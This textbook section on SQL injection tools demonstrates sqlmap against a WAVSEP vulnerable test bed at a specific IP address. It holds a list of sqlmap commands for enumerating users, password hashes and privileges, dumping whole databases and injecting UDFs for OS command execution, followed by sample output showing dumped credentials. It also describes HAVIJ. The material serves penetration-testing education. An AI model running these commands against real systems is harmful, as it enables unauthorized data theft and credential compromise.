4.2.3 Common SQL Injection Tools

1. sqlmap

sqlmap is a free, open-source tool for detecting and exploiting SQL injection vulnerabilities. Its standout feature is that both detection and exploitation are automated (database fingerprinting, access to the underlying file system, operating-system command execution). The source can be downloaded from the project's SourceForge page (see Figure 4-10): http://sourceforge.net/projects/sqlmap/

Figure 4-10 The sqlmap interface

It can also be fetched with git from the GitHub repository, which is where development takes place:


git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

Common sqlmap commands (short options are case-sensitive: -u is the target URL while -U names a database user; -D, -T and -C select the database, table and columns):


sqlmap -u "http://url/news?Id=1" --dbms "mysql" --users   # --dbms forces the back-end DBMS type instead of fingerprinting it
sqlmap -u "http://url/news?Id=1" --users                  # enumerate database users
sqlmap -u "http://url/news?Id=1" --dbs                    # enumerate databases
sqlmap -u "http://url/news?Id=1" --passwords              # enumerate database users' password hashes
sqlmap -u "http://url/news?Id=1" --passwords -U root -v 0 # password hash of the specified user (-U, not -u)
sqlmap -u "http://url/news?Id=1" --dump -C "password,user,id" -T "tablename" -D "db_name" --start 1 --stop 20 # dump the named columns, entries 1 to 20
sqlmap -u "http://url/news?Id=1" --dump-all -v 0          # dump every table of every database
sqlmap -u "http://url/news?Id=1" --privileges             # enumerate privileges
sqlmap -u "http://url/news?Id=1" --privileges -U root     # privileges of the specified user
sqlmap -u "http://url/news?Id=1" --is-dba -v 1            # is the current database user a DBA?
sqlmap -u "http://url/news?Id=1" --roles                  # enumerate database user roles
sqlmap -u "http://url/news?Id=1" --udf-inject             # inject user-defined functions (can lead to OS-level command execution)
sqlmap -u "http://url/news?Id=1" --dump-all --exclude-sysdbs -v 0 # dump every table except those in system databases
sqlmap -u "http://url/news?Id=1" --union-cols 1-10        # range of column counts to try for UNION-based injection (the option needs a value)
sqlmap -u "http://url/news?Id=1" --cookie "cookie_value"  # send this cookie; cookie parameters are only tested as injection points with --level 2 or higher
sqlmap -u "http://url/news?Id=1" -b                       # retrieve the DBMS banner (same as --banner)
sqlmap -u "http://url/news?Id=1" --data "id=3"            # POST injection: the string is sent in the request body and its parameters are tested
sqlmap -u "http://url/news?Id=1" -v 1 -f                  # extensive DBMS fingerprint (same as --fingerprint)

We use the WAVSEP test bed to demonstrate what sqlmap can do. The URL containing the SQL injection vulnerability is:


http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2

The injection point is the username parameter, so -p username tells sqlmap to test only that parameter.

·Identify the back-end database type:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username

Output:


[10:45:03] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL >= 5.0
[10:45:03] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

·Enumerate database users:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --users

Output:


database management system users [1]:
[*] 'wavsep'@'localhost'

[10:51:26] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 4 times
[10:51:26] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

[*] shutting down at 10:51:26

·Enumerate databases:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username --dbs

Output:


[10:54:51] [INFO] fetching database names
[10:54:52] [INFO] the SQL query used returns 2 entries
[10:54:52] [INFO] retrieved: information_schema
[10:54:52] [INFO] retrieved: wavsepDB
available databases [2]:
[*] information_schema
[*] wavsepDB

·Dump every row of a given table (-T) in a given database (-D):


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB -T users --dump

Output:


Database: wavsepDB
Table: users
[7 entries]
+--------+----------+------------+-----------+
| userid | username | password   | privilege |
+--------+----------+------------+-----------+
| 1      | user1    | password   | 1         |
| 2      | david    | goodboy    | 1         |
| 3      | admin    | mastermold | 5         |
| 4      | user4    | password4  | 1         |
| 5      | user5    | password5  | 2         |
| 6      | user6    | password6  | 1         |
| 7      | user7    | password7  | 1         |
+--------+----------+------------+-----------+

[11:10:05] [INFO] table 'wavsepDB.users' dumped to CSV file '/Users/liu.yan/.sqlmap/output/182.61.11.23/dump/wavsepDB/users.csv'
[11:10:05] [INFO] fetched data logged to text files under '/Users/liu.yan/.sqlmap/output/182.61.11.23'

[*] shutting down at 11:10:05

·Dump all tables of the given database:


./sqlmap.py -u "http://182.61.11.23:8080/wavsep/active/SInjection-Detection-Evaluation-GET-500Error/Case01-InjectionInLogin-String-LoginBypass-WithErrors.jsp?username=textvalue&password=textvalue2" -p username -D wavsepDB --dump-all -v 0

Output (sqlmap resumes previously retrieved entries from its session files rather than re-fetching them):


[11:05:30] [INFO] resumed: 8
Database: wavsepDB
Table: transactions
[8 entries]
+--------+---------------+-------+-----------------------+-----------------+
| userid | transactionId | sum   | description           | transactionDate |
+--------+---------------+-------+-----------------------+-----------------+
| 1      | 132           | 1000  | Simple Transaction    | 2010-01-01      |
| 2      | 133           | 1200  | Simple Transaction    | 2010-01-01      |
| 3      | 135           | 3000  | Simple Transaction    | 2010-01-01      |
| 4      | 223           | 4000  | Simple Transaction    | 2010-01-01      |
| 5      | 423           | 5000  | Simple Transaction    | 2010-01-01      |
| 6      | 456           | 6000  | Simple Transaction    | 2010-01-01      |
| 7      | 789           | 7012  | Expensive Transaction | 2010-01-01      |
| 8      | 895           | 8000  | Expensive Transaction | 2010-02-02      |
+--------+---------------+-------+-----------------------+-----------------+

[*] shutting down at 11:05:30

2. HAVIJ

HAVIJ is an automated SQL injection tool with a graphical interface (see Figure 4-11) that helps penetration testers find and exploit SQL injection vulnerabilities in web applications. Unlike sqlmap it is a closed-source Windows program, so its injection logic cannot be inspected or extended.

Figure 4-11 The HAVIJ interface

Supported detection types include:

·MSSQL 2000/2005 with error;

·MSSQL 2000/2005 no-error union-based;

·MSSQL blind;

·MSSQL time-based;

·MySQL union-based;

·MySQL blind;

·MySQL error-based;

·MySQL time-based;

·Oracle union-based;

·Oracle error-based;

·Oracle blind;

·PostgreSQL union-based;

·MS Access union-based;

·MS Access blind;

·Sybase (ASE);

·Sybase (ASE) blind.